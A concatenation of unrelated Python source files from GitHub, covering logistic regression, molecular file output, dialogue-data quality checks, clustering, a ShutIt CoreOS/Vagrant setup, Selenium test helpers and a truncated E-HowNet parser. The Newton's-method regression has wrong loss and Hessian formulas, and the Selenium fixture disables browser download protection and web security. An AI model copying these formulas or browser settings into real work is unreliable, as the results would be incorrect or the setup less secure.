| NWalker4483/FlightRegister | main.py | main.py | py | 2,831 | python | en | code | 0 | github-code | 36 |
40306764598 | import numpy as np
import pandas as pd
from collections import OrderedDict
def loss(h,y):
return ( -y * np.log(h) - ( 1- y )*(np.log(1-y)) ).mean()
def add_intercept(X):
intercept = np.ones((X.shape[0],1))
X= np.reshape(X,(-1,1))
#print('intercept',intercept,X)
return np.concatenate((intercept, X), axis=1)
def predict(x,w):
x = add_intercept(x)
h = np.dot(x,w)
return sigmoid(h).round()
def sigmoid(x):
'''
returns sigmoid h(x)= 1/(e^-x + 1) of the input x
'''
return 1/(1+np.exp(-x))
def check_for_convergence(beta_old,beta_new,tol=1e-3):
'''
Checks whether the coefficients have converged in the l-infinity norm.
Returns True if they have converged, False otherwise.'''
#calculate the change in the coefficients
coef_change = np.abs(beta_old - beta_new)
#if change hasn't reached the threshold and we have more iterations to go, keep training
return not (np.any(coef_change>tol) )
def get_data():
data = OrderedDict(
amount_spent = [50, 10, 20, 5, 95, 70, 100, 200, 0],
send_discount = [0, 1, 1, 1, 0, 0, 0, 0, 1]
)
df = pd.DataFrame.from_dict(data) # creating a dataframe
X = df['amount_spent'].astype('float').values # converting the type to 'float'
y = df['send_discount'].astype('float').values # converting the type to 'float'
return (X,y) # returning the X , y
def hessian_runner(X,y,learning_rate=0.01,epochs=10000):
X = add_intercept(X)
W = np.zeros(X.shape[1])
#print('m =>' ,X)
for i in range(epochs):
theta = np.dot(X,W)
h = sigmoid(theta)
gradient = np.dot( X.T , h-y) / y.size
hessian = np.dot(X.T,np.dot(h,1-h)).dot(X) / y.size
#hessian = np.dot(x_h,X.T)
inv_hessian = np.linalg.inv(hessian)
#sprint('inverse-hessian -> ',inv_hessian)
W_old = W
W = W - ( learning_rate * np.dot( inv_hessian, gradient ) )
if check_for_convergence(W_old,W):
W=W_old
print('Converged @ ',i)
break;
if i % 1000 == 0:
print('Running : ',i,W,W_old)
print('test : ',predict(np.array([[15],[155],[45],[55]]),W))
def run():
X , y= get_data()
hessian_runner(X,y)
if __name__ == "__main__":
run()
| guruprasaad123/ml_for_life | from_scratch/logistic_regression/Newtons method/hessian.py | hessian.py | py | 2,333 | python | en | code | 4 | github-code | 36 |
5035742744 | import os
import sys
from ase import io
#color can be
# - A color is specified either as a number between 0 and 1 (gray value),
# three numbers between 0 and 1 (red, green, blue values or RGB),
# or as a color name from the file /usr/lib/X11/rgb.txt (or similar).
xbs_file = open("new_xbs.bs",'w')
xbs_str="atom {} {:.3f} {:.3f} {:.3f}"
# spec Name Radius Colour
spec_strs= ["spec Fe 0.450 0.4",
"spec C 0.450 0.7",
"spec H 0.200 0.0"]
# bonds name 1 name 2 min-length max-length radius color
bond_strs =["bonds Fe Fe 0.000 2.6 0.06 1.0",
"bonds C Fe 0.000 2.6 0.09 0.8",
"bonds C H 0.000 2.1 0.04 0.8",
"bonds Fe H 0.000 2.0 0.04 1.0"]
#various parameters that can be controlled on the command line.
param_str = "inc 1"
#read xyzfile from sys.argv
ats = io.read(sys.argv[1],index="1")
print >> xbs_file, "*FeH system Migrating Fe is Labeled C"
for symbol, pos in zip(ats.get_chemical_symbols(), ats.get_positions()):
print >> xbs_file, xbs_str.format(symbol,pos[0],pos[1],pos[2])
print >> xbs_file,""
for spec_str in spec_strs:
print >> xbs_file, spec_str
print >> xbs_file,""
for bond_str in bond_strs:
print >> xbs_file, bond_str
print >> xbs_file,""
print >> xbs_file, param_str
xbs_file.close()
| Montmorency/imeall | imeall/tbe_tools/xyz_xbs.py | xyz_xbs.py | py | 1,503 | python | en | code | 8 | github-code | 36 |
74050038184 | import numpy as np
from typing import Iterable, List
from nltk.stem import PorterStemmer
from parlai.crowdsourcing.utils.acceptability import (
AcceptabilityChecker,
normalize_answer,
)
import parlai.utils.logging as logging
# Bad persona violations
PERSONA_REPEATS_PROMPT = 'repeated the prompt text'
ASKED_WIZARD_QUESTION = 'asked wizard in the persona details'
COPIED_EXTENDED_PERSONA = 'extended persona copies the main persona'
GENERIC_EXTENDED_PERSONA = 'extended persona is generic'
QUESTION_PHRASE = 'what is your'
# Wizard knowledge violations
DEFAULT_KNOWLEDGE_OVERLAP_THRESHOLD = 0.05
POOR_SEARCH_QUERIES = 'poor search queries'
IRRELEVANT_SEARCH__QUERIES = 'irrelevant search terms'
NOT_ENOUGH_SEARCH = 'not enough selected knowledge sources'
SELECTED_SHORT_PIECES = 'short knowledge pieces selected.'
LOW_KNOWLEDGE_OVERLAP = 'low knowledge overlap'
def tokenize_text(text, stemmer, as_set=True):
text = normalize_answer(text)
tokens = [stemmer.stem(word) for word in text.split(' ')]
if as_set:
tokens = set(tokens)
return tokens
def overlap_ratios(a: set, b: set) -> float:
"""
Calculates the Jacard distance between two sets.
"""
overlap = a.intersection(b)
union = a.union(b)
return len(overlap) / (len(union) + 0.001)
def is_valid_agent_chat_message(message, agent_id):
return (
message.get('text')
and message.get('id') == agent_id
and not message.get('is_search_query', False)
)
def bad_persona(persona, stemmer):
"""
Check for poor persona selection by apprentice.
"""
persona_parts = persona.split('\n')
# It is not from the persona selection ones (personas used during the pilot).
if not (
len(persona_parts) == 2
or (len(persona_parts) == 3 and 'I live in ' in persona_parts[0])
):
logging.warning(f'Old fashioned persona: {persona}')
return
# Removing the location ('I live in X') part
if len(persona_parts) == 3:
persona_parts = persona_parts[1:]
main_pers, ext_pers = [p.lower() for p in persona_parts]
violations = []
# Bad main persona response
if main_pers.startswith('My favorite '):
for phrase in ('i like', 'my favorite'):
persona_core = main_pers
# Remove the original My favorite
persona_core = main_pers[len('My favorite ') :]
if phrase in persona_core.lower():
violations.append(PERSONA_REPEATS_PROMPT)
break
# Extended persona that asks questions
for phrase in (QUESTION_PHRASE,):
if phrase in ext_pers:
violations.append(ASKED_WIZARD_QUESTION)
# Extended persona that mostly repeats the main persona
main_pers_tokens = tokenize_text(main_pers, stemmer)
ext_pers_tokens = tokenize_text(ext_pers, stemmer)
if len(ext_pers_tokens.difference(main_pers_tokens)) < 2:
violations.append(COPIED_EXTENDED_PERSONA)
# Use of non-generic words in persona.
common_phrases = ('i', 'it', 'like', 'very', 'much', 'favorite', 'is', 'am')
tokens = [w.strip() for w in ext_pers.split(' ') if w]
ext_useful_words = [t for t in tokens if t not in common_phrases]
if len(tokens) > 4 and len(ext_useful_words) < 2:
violations.append(GENERIC_EXTENDED_PERSONA)
return violations
def poor_knowledge_selection(messages, persona, stemmer, knwldg_ovlp_thrshld):
"""
Check for poor search and knowledge selection by wizard.
"""
# Collecting search and knowledge selections
search_terms = []
selected_knowledge = []
message_history_tokens = tokenize_text(persona, stemmer)
n_search_query_not_in_history = 0
for msg in messages:
if msg.get('text', None):
message_history_tokens = message_history_tokens.union(
tokenize_text(msg['text'], stemmer)
)
if msg['id'] != 'Wizard':
continue
selections = msg.get('task_data', {}).get('selected_text_candidates')
if not selections or selections[0][0]:
continue
search_query = msg['task_data']['search_query']
search_terms.append(search_query)
if message_history_tokens.isdisjoint(tokenize_text(search_query, stemmer)):
n_search_query_not_in_history += 1
selected_parts = []
for doc_id in range(1, len(selections)):
doc_selections = selections[doc_id]
for sentence_id in range(len(doc_selections)):
if doc_selections[sentence_id]:
selected_parts.append(
msg['task_data']['text_candidates'][doc_id - 1]['content'][
sentence_id
]
)
selected_knowledge.append(
{'text': msg['text'], 'knowledge': ' '.join(selected_parts)}
)
knowledge_length = []
knowledge_overlaps = []
for knwldg in selected_knowledge:
knowledge_tokens = tokenize_text(knwldg['knowledge'], stemmer)
knowledge_length.append(len(knowledge_tokens))
response_tokens = tokenize_text(knwldg['text'], stemmer)
knowledge_overlaps.append(overlap_ratios(knowledge_tokens, response_tokens))
violations = []
# Repeated the same search queries
if len(search_terms) - len(set(search_terms)) > 3:
violations.append(POOR_SEARCH_QUERIES)
# Search doesn't have overlap with message history
if n_search_query_not_in_history > 2:
violations.append(IRRELEVANT_SEARCH__QUERIES)
# No selection
if not knowledge_length:
violations.append(NOT_ENOUGH_SEARCH)
# Only selecting short sentences
if np.average(knowledge_length) < 5:
violations.append(SELECTED_SHORT_PIECES)
# Small overlap between response and the selected knowledge parts
knowledge_overlap_avg = np.average(knowledge_overlaps)
if knowledge_overlap_avg < knwldg_ovlp_thrshld:
violations.append(f'{LOW_KNOWLEDGE_OVERLAP} ({knowledge_overlap_avg})')
return violations
class WizardOfInternetAcceptabilityChecker(AcceptabilityChecker):
"""
ParlAI general acceptabilty checker customized for the wizard of internet.
"""
def __init__(self):
self.knowledge_overlap_threshold = DEFAULT_KNOWLEDGE_OVERLAP_THRESHOLD
self.post_stemmer = PorterStemmer()
super().__init__()
def check_messages(
self,
agent_id: str,
persona: str,
messages: List[str],
is_worker_0: bool,
violation_types: Iterable[str] = (),
) -> str:
violations = []
general_chat_violations = super().check_messages(
self.get_conversation_messages(messages, agent_id),
is_worker_0,
violation_types,
)
if general_chat_violations:
violations.extend(general_chat_violations.split(','))
if agent_id == 'Apprentice':
persona_violations = bad_persona(persona, self.post_stemmer)
if persona_violations:
violations.extend(persona_violations)
if agent_id == 'Wizard':
knowledge_violations = poor_knowledge_selection(
messages, persona, self.post_stemmer, self.knowledge_overlap_threshold
)
if knowledge_violations:
violations.extend(knowledge_violations)
return ','.join(violations)
def get_conversation_messages(self, agent_messages, agent_id):
return [
msg['text']
for msg in agent_messages
if is_valid_agent_chat_message(msg, agent_id)
]
| facebookresearch/ParlAI | parlai/crowdsourcing/projects/wizard_of_internet/acceptability.py | acceptability.py | py | 7,697 | python | en | code | 10,365 | github-code | 36 |
36970594221 | line = [x for x in input().split()]
answer = 0
for i in range(len(line)):
if line.count(line[i]) == 1:
continue
else:
answer = 1
if answer == 0:
print("yes")
else:
print("no")
| jgpstuart/Kattis-Solutions | nodup.py | nodup.py | py | 209 | python | en | code | 0 | github-code | 36 |
27941614537 | from itertools import chain
from itertools import islice
from itertools import repeat
from math import ceil
import numpy as np
from scipy.sparse import issparse
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import scale
kernels = ["linear", "poly", "polynomial", "rbf", "laplacian", "sigmoid",
"cosine"]
oneminus = ["braycurtis", "correlation", "dice", "jaccard", "kulsinksi",
"rogerstanimoto", "russelrao", "rbf", "chi2", "laplacian",
"sigmoid"]
def _knn_sim(X, metric=None, n_neighbors=None, p=None,
metric_params=None):
"""Compute the Jaccard distance over the kNN graph.
The metric parameter can be used to specify which metric
is used to construct the kNN graph."""
n_neighbors = 5 if n_neighbors is None else n_neighbors
metric = "euclidean" if metric is None else metric
# get the kNN graph
knn_graph = kneighbors_graph(X, n_neighbors, mode="distance",
metric=metric, p=p,
metric_params=metric_params).toarray()
return _similarities(knn_graph, metric="jaccard")
def _distances(X1, X2=None, metric=None, metric_params=None):
"""Calls sklearn.pairwise.pairwise_distances or
sklearn.pairwise_pairwise_kernels and returns the distance
between X1 and X2."""
metric = "euclidean" if metric is None else metric
if metric in kernels:
if metric == "cosine":
return pairwise_distances(X1, X2, metric="cosine")
else:
if metric_params is None:
S = pairwise_kernels(X1, X2, metric)
else:
S = pairwise_kernels(X1, X2, metric, **metric_params)
if metric == "additive_chi2":
return - 1 * S
else:
return np.max(S) - S
elif metric == "knn_jaccard":
S = _similarities(X1, X2, metric="knn_jaccard",
**metric_params)
return 1 - S
else:
return pairwise_distances(X=X1, Y=X2, metric=metric)
def _similarities(X1, X2=None, metric=None, knn_metric=None,
n_neighbors=None, p=None, metric_params=None):
"""Calls sklearn.pairwise.pairwise_distances or
sklearn.pairwise_pairwise_kernels and returns the similarity
between X1 and X2.
n_neighbors and p are only for knn_metrics."""
metric = "euclidean" if metric is None else metric
if metric in kernels:
if metric_params is None:
return pairwise_kernels(X1, X2, metric)
else:
return pairwise_kernels(X1, X2, metric, **metric_params)
elif metric == "knn_jaccard":
if X2 is None:
return _knn_sim(X1, metric=knn_metric,
n_neighbors=n_neighbors, p=p,
metric_params=metric_params)
else:
print("Not implemented for two matrices")
return None
else:
D = pairwise_distances(X1, X2, metric)
if metric in oneminus:
return 1 - D
else:
return 1 / (1 + D)
def _permute(X, n=None, axis=None, seed=None):
"""Permute a frame n times along a given axis."""
X = X.copy()
if (issparse(X)) and (X.getformat() not in ["csr", "csc"]):
X = X.tocsr()
axis = 0 if axis is None else axis
seed = 42 if seed is None else seed
np.random.seed(seed)
indices = np.random.permutation(X.shape[axis])
P = X[:, indices] if axis == 1 else X[indices, :]
return P
def _linreg_get_beta(x, y, scale_exp):
"""Use Scipy linregress to get the regression coefficient."""
from scipy.stats import linregress
if scale_exp is True:
x = scale(x)
return linregress(x, y)[0]
def _chunk_indices(X, n, axis=None):
"""A generator to return n chunks of an array."""
axis = 0 if axis is None else axis
if (axis != 0) and (axis != 1):
print("Please provide a valid axis (0 or 1)")
length = X.shape[0] if axis == 0 else X.shape[1]
size = ceil(length / n)
for i in range(0, length, size):
yield range(length)[i:i + size]
def _make_generator(iterable):
for i in iterable:
yield i
def _chunk_generator(generator, size=None):
for g in generator:
yield chain([g], islice(generator, size - 1))
def _std_sparse(X, axis=None, ddof=None):
axis = 0 if axis is None else axis
ddof = 0 if ddof is None else ddof
def _variance(array):
N = len(array)
return 1 / (N - ddof) * (np.sum(np.abs(array - array.mean()) ** 2))
if axis == 0:
c = X.shape[1]
var = np.array([_variance(X[:, i].data) for i in range(c)])
return np.sqrt(var)
else:
c = X.shape[0]
var = np.array([_variance(X[i, :].data) for i in range(c)])
return np.sqrt(var)
| ohlerlab/SEMITONES | src/SEMITONES/_utils.py | _utils.py | py | 4,987 | python | en | code | 8 | github-code | 36 |
29182985049 | """ShutIt module. See http://shutit.tk
"""
from shutit_module import ShutItModule
class coreos_vagrant(ShutItModule):
def build(self, shutit):
# Some useful API calls for reference. See shutit's docs for more info and options:
#
# ISSUING BASH COMMANDS
# shutit.send(send,expect=<default>) - Send a command, wait for expect (string or compiled regexp)
# to be seen before continuing. By default this is managed
# by ShutIt with shell prompts.
# shutit.multisend(send,send_dict) - Send a command, dict contains {expect1:response1,expect2:response2,...}
# shutit.send_and_get_output(send) - Returns the output of the sent command
# shutit.send_and_match_output(send, matches)
# - Returns True if any lines in output match any of
# the regexp strings in the matches list
# shutit.send_until(send,regexps) - Send command over and over until one of the regexps seen in the output.
# shutit.run_script(script) - Run the passed-in string as a script
# shutit.install(package) - Install a package
# shutit.remove(package) - Remove a package
# shutit.login(user='root', command='su -')
# - Log user in with given command, and set up prompt and expects.
# Use this if your env (or more specifically, prompt) changes at all,
# eg reboot, bash, ssh
# shutit.logout(command='exit') - Clean up from a login.
#
# COMMAND HELPER FUNCTIONS
# shutit.add_to_bashrc(line) - Add a line to bashrc
# shutit.get_url(fname, locations) - Get a file via url from locations specified in a list
# shutit.get_ip_address() - Returns the ip address of the target
#
# LOGGING AND DEBUG
# shutit.log(msg,add_final_message=False) -
# Send a message to the log. add_final_message adds message to
# output at end of build
# shutit.pause_point(msg='') - Give control of the terminal to the user
# shutit.step_through(msg='') - Give control to the user and allow them to step through commands
#
# SENDING FILES/TEXT
# shutit.send_file(path, contents) - Send file to path on target with given contents as a string
# shutit.send_host_file(path, hostfilepath)
# - Send file from host machine to path on the target
# shutit.send_host_dir(path, hostfilepath)
# - Send directory and contents to path on the target
# shutit.insert_text(text, fname, pattern)
# - Insert text into file fname after the first occurrence of
# regexp pattern.
# ENVIRONMENT QUERYING
# shutit.host_file_exists(filename, directory=False)
# - Returns True if file exists on host
# shutit.file_exists(filename, directory=False)
# - Returns True if file exists on target
# shutit.user_exists(user) - Returns True if the user exists on the target
# shutit.package_installed(package) - Returns True if the package exists on the target
# shutit.set_password(password, user='')
# - Set password for a given user on target
vagrant_dir = shutit.cfg[self.module_id]['vagrant_dir']
if shutit.send_and_get_output('''VBoxManage list runningvms | grep coreos-vagrant | grep -v 'not created' | awk '{print $1}' ''') != '':
if shutit.get_input('Clean up your VMs first, as there appears to be a running coreos-vagrant VM in existence. Want me to clean them up for you (y/n)?',boolean=True):
shutit.multisend('(cd coreos-vagrant && vagrant destroy)',{'y/N':'y'})
memavail = shutit.get_memory()
if memavail < 3500000:
if not shutit.get_input('Memory available appears to be: ' + str(memavail) + 'kB, need 3500000kB available to run.\nIf you want to continue, input "y", else "n"',boolean=True):
shutit.fail('insufficient memory')
shutit.send('cd')
for c in ('virtualbox','git','curl'):
if not shutit.command_available(c):
if shutit.get_input(c + ' apparently not installed. Would you like me to install it for you?',boolean=True):
pw = shutit.get_input('Please input your sudo password in case it is needed.',ispass=True)
command = shutit.get_input('Please input your install command, eg "apt-get install -y", or "yum install -y"')
shutit.multisend('sudo ' + command + ' ' + c,{'assword':pw})
if not shutit.command_available('vagrant'):
shutit.send('wget -qO- https://dl.bintray.com/mitchellh/vagrant/vagrant_1.7.2_x86_64.deb > /tmp/vagrant.deb',note='Downloading vagrant and installing')
shutit.send('dpkg -i /tmp/vagrant.deb')
shutit.send('rm /tmp/vagrant.deb')
shutit.send('mkdir -p ' + vagrant_dir)
shutit.send('cd ' + vagrant_dir)
shutit.send('cd')
shutit.send('rm -rf coreos-vagrant')
shutit.send('git clone https://github.com/coreos/coreos-vagrant.git',note='Get the coreos-vagrant github repo')
shutit.send('cd coreos-vagrant')
# Get coreos id discovery token
token = shutit.send_and_get_output('curl https://discovery.etcd.io/new')
shutit.send('cp user-data.sample user-data')
shutit.replace_text(''' discovery: ''' + token,'user-data','.*#discovery:.*')
# update with token
shutit.send('cp config.rb.sample config.rb')
shutit.replace_text('$num_instances=3','config.rb','^.num_instances=.*$')
shutit.send('vagrant up')
shutit.send_until('vagrant status','core-01.*running')
shutit.send_until('vagrant status','core-02.*running')
shutit.send_until('vagrant status','core-03.*running')
shutit.login(command='vagrant ssh core-01')
shutit.pause_point('You are now in your coreos cluster! Enjoy!\n\nIf you want to start again, ctrl-d once to get out of this coreos machine, run "vagrant destroy" and then re-run.')
shutit.logout()
return True
def get_config(self, shutit):
# CONFIGURATION
# shutit.get_config(module_id,option,default=None,boolean=False)
# - Get configuration value, boolean indicates whether the item is
# a boolean type, eg get the config with:
# shutit.get_config(self.module_id, 'myconfig', default='a value')
# and reference in your code with:
# shutit.cfg[self.module_id]['myconfig']
shutit.get_config(self.module_id, 'vagrant_dir', '/tmp/vagrant_dir')
return True
def test(self, shutit):
# For test cycle part of the ShutIt build.
return True
def finalize(self, shutit):
# Any cleanup required at the end.
return True
def is_installed(self, shutit):
return False
def module():
return coreos_vagrant(
'shutit.coreos_vagrant.coreos_vagrant.coreos_vagrant', 1308628950.00,
description='',
maintainer='',
delivery_methods = ('bash'),
depends=['shutit.tk.setup']
)
| ianmiell/shutit-coreos-vagrant | coreos_vagrant.py | coreos_vagrant.py | py | 7,151 | python | en | code | 2 | github-code | 36 |
71079803305 | import gzip
import json
import numpy as np
import pandas as pd
from tqdm.notebook import tqdm
from datetime import datetime
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
from collections import Counter
#Funciones.
def jl_to_list(fname):
output = []
with gzip.open(fname, 'rb') as f:
for line in f:
output.append(json.loads(line))
return output
def load_item_data(all_itms = False):
ITEM_DATA = pd.read_csv('item_data.csv', sep=';')
ITEM_DATA.loc[ITEM_DATA['product_id'] == 0, 'product_id'] = -1
ITEM_DATA['domain_code'], domain_uniques = pd.factorize(ITEM_DATA['domain_id'], sort=True)
ITEM_DATA['category_code'], category_uniques = pd.factorize(ITEM_DATA['category_id'], sort=True)
fields = ['item_id', 'domain_id', 'domain_code', 'product_id', 'category_id', 'category_code', 'price', 'price_cluster', 'condition', 'mexico']
m = {}
for column in tqdm(fields):
m[column] = list(ITEM_DATA[column])
metadata = {}
for i, j in tqdm(enumerate(m['item_id'])):
metadata[j] = {}
for column in fields:
metadata[j].update({column: m[column][i]})
if all_itms:
all_items = list(metadata)
else:
all_items = []
return metadata, all_items
def views(row):
return ([ev['event_info'] for ev in row['user_history'] if ev['event_type']=='view'])
def searchs(row):
return ([ev['event_info'] for ev in row['user_history'] if ev['event_type']=='search'])
def dominios_visitados(visits):
domains = Counter()
for item in visits:
domain = metadata[item]['domain_code']
domains[domain] += 1
return domains
def productos_visitados(visits):
productos = Counter()
for item in visits:
producto = metadata[item]['product_id']
if producto:
productos[producto] += 1
return productos
def categorias_visitadas(visits):
categorias = Counter()
for item in visits:
categoria = metadata[item]['category_code']
if categoria:
categorias[categoria] += 1
return categorias
def get_session_time(history):
last_event=len(history)-1
t0=datetime.strptime(history[0]['event_timestamp'].replace('T',' ')[:-5],'%Y-%m-%d %H:%M:%S.%f')
t1=datetime.strptime(history[last_event]['event_timestamp'].replace('T',' ')[:-5],'%Y-%m-%d %H:%M:%S.%f')
T=t1-t0
return T.days*24*60*60+T.seconds+T.microseconds/1000000
def precio_mediano(visits):
precios = []
for item in visits:
if metadata[item]['price']:
precios.append(float(metadata[item]['price']))
if len(precios) != 0:
return np.median(np.array(precios))
else:
return 0
def precio_desvio(visits):
precios = []
for item in visits:
if metadata[item]['price']:
precios.append(float(metadata[item]['price']))
if len(precios) != 0:
return np.std(np.array(precios))
else:
return 0
def mercado(visits):
mexico = []
for item in visits:
mexico.append(int(metadata[item]['mexico']))
if np.mean(np.array(mexico)) > 0.5:
return 1
else:
return 0
def data_for_clusters(rows_data):
cluster_data = []
for row in tqdm(rows_data):
temp = {'d_visitados': len(dominios_visitados(views(row))),
'p_visitados': len(productos_visitados(views(row))),
'c_visitadas': len(categorias_visitadas(views(row))),
's_time': get_session_time(row['user_history']),
's_len': len(row['user_history']),
'v_len': len(views(row)),
'p_views': len(views(row)) / len(row['user_history']),
'median_p': precio_mediano(views(row)),
'sd_p': precio_desvio(views(row)),
'mercado': mercado(views(row))}
cluster_data.append(temp)
return pd.DataFrame(cluster_data)
def data_for_segments(rows_data):
cluster_data = []
for row in tqdm(rows_data):
temp = {'v_len': len(views(row)),
's_len': len(searchs(row))}
cluster_data.append(temp)
return pd.DataFrame(cluster_data)
def data_for_features(rows_data):
cluster_data = []
for row in tqdm(rows_data):
temp = {'domain_code': list(dominios_visitados(views(row))),
'product_id': list(productos_visitados(views(row))),
'category_code': list(categorias_visitadas(views(row))),
'median_p': precio_mediano(views(row)),
'sd_p': precio_desvio(views(row)),
'mercado': mercado(views(row))}
cluster_data.append(temp)
return pd.DataFrame(cluster_data)
def dominio_mas_visitado(rows_data):
cluster_data = []
for row in tqdm(rows_data):
dominios = list(dominios_visitados(views(row)))
if len(dominios) > 0:
temp = {'vdomain': list(dominios_visitados(views(row)))[0]}
else:
temp = {'vdomain': -1}
cluster_data.append(temp)
return pd.DataFrame(cluster_data)
def clustering_process(df, k):
#Normalizacion.
df_norm = StandardScaler().fit_transform(df)
#Estructura para resultados.
cs=np.empty(shape=[len(df_norm),1])
#Algoritmo.
kmeans=KMeans(n_clusters=k)
kmeans.fit(df_norm)
cs[:,0]=kmeans.fit_predict(df_norm)
#Concat.
df_cs=pd.DataFrame(cs,columns=['cluster'])
df_final=pd.concat([df,df_cs],axis=1)
if k <= 100:
print(df_cs['cluster'].value_counts())
return df_cs, kmeans
def clustering_predict(df, kmeans, k=10):
#Normalizacion.
df_norm = StandardScaler().fit_transform(df)
#Estructura para resultados.
cs=np.empty(shape=[len(df_norm),1])
#Algoritmo.
cs[:,0]=kmeans.fit_predict(df_norm)
#Concat.
df_cs=pd.DataFrame(cs,columns=['cluster'])
df_final=pd.concat([df,df_cs],axis=1)
if k <= 100:
print(df_final['cluster'].value_counts())
return df_final
def meli_clusters(k):
df = pd.read_csv('meli_data.csv', sep=';')
df_c, kmeans = clustering_process(df, k)
return df_c, kmeans
#Datos.
metadata, _ = load_item_data() | estereotipau/meli_challenge_2020 | simple_cluster_EG.py | simple_cluster_EG.py | py | 6,186 | python | en | code | 4 | github-code | 36 |
14112986280 | import os
import allure
import pytest
import logging
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
import allure
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
class BasePage:
def __init__(self, driver):
self.driver = driver
@allure.step("Проверка URL: {expected_url}")
def check_url(self, expected_url):
assert self.driver.current_url == expected_url
logging.info(
f"Проверка URL: Ожидаемый URL - {expected_url}, "
f"текущий URL - {self.driver.current_url}"
)
class SbisHomePage(BasePage):
URL = "https://sbis.ru/"
@allure.step("Переход в раздел 'Контакты'.")
def go_to_contacts(self):
header_menu = self.driver.find_element(
By.CLASS_NAME,
"sbisru-Header__menu.ws-flexbox.ws-align-items-center"
)
contacts_link = header_menu.find_element(By.LINK_TEXT, "Контакты")
contacts_link.click()
logging.info("Переход на страницу 'Контакты' выполнен.")
@pytest.fixture
def browser():
download_folder = os.path.join(os.path.dirname(__file__), 'downloads')
chrome_options = Options()
chrome_options.add_experimental_option('prefs', {
'download.default_directory': download_folder,
'download.prompt_for_download': False,
'download.directory_upgrade': True,
'safebrowsing.enabled': False,
'profile.default_content_settings.popups': 0
})
chrome_options.add_argument('--disable-notifications')
chrome_options.add_argument('--disable-infobars')
chrome_options.add_argument('--disable-software-rasterizer')
chrome_options.add_argument('--safebrowsing-disable-download-protection')
chrome_options.add_argument('--disable-web-security')
driver = webdriver.Chrome(options=chrome_options)
yield driver
driver.quit()
def close_cookie_message(driver, class_name):
try:
close_cookie_message = driver.find_element(By.CLASS_NAME, class_name)
if close_cookie_message.is_displayed():
close_cookie_message.click()
logging.info("Закрытие сообщения о куки выполнено.")
except NoSuchElementException:
pass
| nasretdinovs/tensor_autotest | common.py | common.py | py | 2,451 | python | en | code | 0 | github-code | 36 |
42882353355 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Please refer the tutorial ":ref:`tutorial-parse_parser`".
"""
# pylint: disable=invalid-name, no-self-use
__author__ = "Mu Yang <http://muyang.pro>"
__copyright__ = "2018-2021 CKIP Lab"
__license__ = "GPL-3.0"
import re
from wcwidth import wcswidth
from ply.lex import lex
from ply.yacc import yacc
from .node import (
EhnParseAnchor,
EhnParseAnyPlaceholder,
EhnParseCoindexReference,
EhnParseFunction,
EhnParseFunctionEntity,
EhnParseFunctionFeature,
EhnParseNameEntity,
EhnParseNormalEntity,
EhnParseNormalFeature,
EhnParseNumberEntity,
EhnParseRestrictionPlaceholder,
EhnParseSubject,
EhnParseSubjectReference,
EhnParseTildeReference,
)
################################################################################################################################
# Core
#
EHN_TOKENS_CHAR = {
"QUOTE": '"',
"EQUAL": "=",
"COLON": ":",
"COMMA": ",",
"SLASH": "/",
"ULINE": "_",
"LPAREN": "(",
"RPAREN": ")",
"LBRACE": "{",
"RBRACE": "}",
"TILDE": "~",
}
EHN_TOKENS = ["TEXT", "NUMBER", "COINDEX", "COINDEX0", *EHN_TOKENS_CHAR.keys()]
class EhnSyntaxError(SyntaxError):
"""E-HowNet Syntax Error."""
def __init__(self, *args, pos=None):
super().__init__(*args)
self.pos = pos
def show_pos(self, text):
"""Show error position.
Parameters
----------
text
original input text
"""
return " " * wcswidth(text[: self.pos]) + "^"
################################################################################################################################
# Lexer
#
class _EhnLexer:
def __init__(self, **kwargs):
self._lexer = lex(module=self, **kwargs)
tokens = EHN_TOKENS
# Skip all spaces
# t_ignore = ' \t\n\r\f\v'
# Default state tokens
t_QUOTE = r'"'
t_EQUAL = r"="
t_COLON = r":"
t_COMMA = r","
t_SLASH = r"/"
t_ULINE = r"_"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_LBRACE = r"{"
t_RBRACE = r"}"
t_TILDE = r"~"
def t_ANY_error(self, t):
raise EhnSyntaxError(f"Illegal character ‘{t.value[0]}’ at position {t.lexpos}.", pos=t.lexpos)
# t.lexer.skip(1)
def t_TEXT(self, t):
r"[A-Za-z0-9\x80-\U0010FFFF|#+\-.?]+"
if _isnumber(t.value):
t.type = "NUMBER"
elif t.value == "x?":
t.type = "COINDEX0"
elif _is_coindex(t.value):
t.type = "COINDEX"
else:
match = re.search(r"[+\-.?]", t.value)
if match:
pos = t.lexpos + match.start()
raise EhnSyntaxError(f"Illegal character ‘{match.group(0)}’ at position {pos}.", pos=pos)
return t
# Invoke the lexer
def __call__(self, data):
self._lexer.input(data)
return iter(self._lexer)
class EhnLexer(_EhnLexer):
"""E-HowNet Lexer.
.. method:: __call__(self, data)
Run tokenization.
"""
################################################################################################################################
# Parser
#
class _EhnParser:
def __init__(self, lexer=None, **kwargs):
if lexer is not None:
assert isinstance(lexer, EhnLexer), f"{lexer} is not an EhnLexer!"
self.lexer = lexer
else:
self.lexer = EhnLexer()
self._parser = yacc(module=self, **kwargs)
@property
def _lexer(self):
return self.lexer._lexer # pylint: disable=protected-access
tokens = EHN_TOKENS
# Define the parser
def p_error(self, t):
if t is None:
msg = "Unexpected ending."
pos = None
else:
msg = f"Unexpected symbol ‘{t.value}’ at position {t.lexpos}."
pos = t.lexpos
syms = []
for sym in self._parser.action[self._parser.state].keys():
sym = EHN_TOKENS_CHAR.get(sym, sym)
if sym == "$end":
syms.append("‘ENDING’")
else:
syms.append(f"‘{sym}’")
if len(syms) > 1:
syms[-1] = "or " + syms[-1]
msg += f' Expecting a {", ".join(syms)}.'
raise EhnSyntaxError(msg, pos=pos)
# Object
def p_expr(self, p):
"""expr : entity
| subject"""
p[0] = p[1]
# Subject
def p_subject(self, p):
"""subject : feature
| subject COMMA feature"""
if len(p) == 2:
p[0] = EhnParseSubject(p[1])
else:
p[1].add_feature(p[3])
p[0] = p[1]
# Entity
def p_entity_number(self, p):
"""entity : LBRACE NUMBER RBRACE"""
p[0] = EhnParseNumberEntity(p[2])
def p_entity_name(self, p):
"""entity : LBRACE QUOTE TEXT QUOTE RBRACE"""
p[0] = EhnParseNameEntity(p[3])
def p_entity_normal_open(self, p):
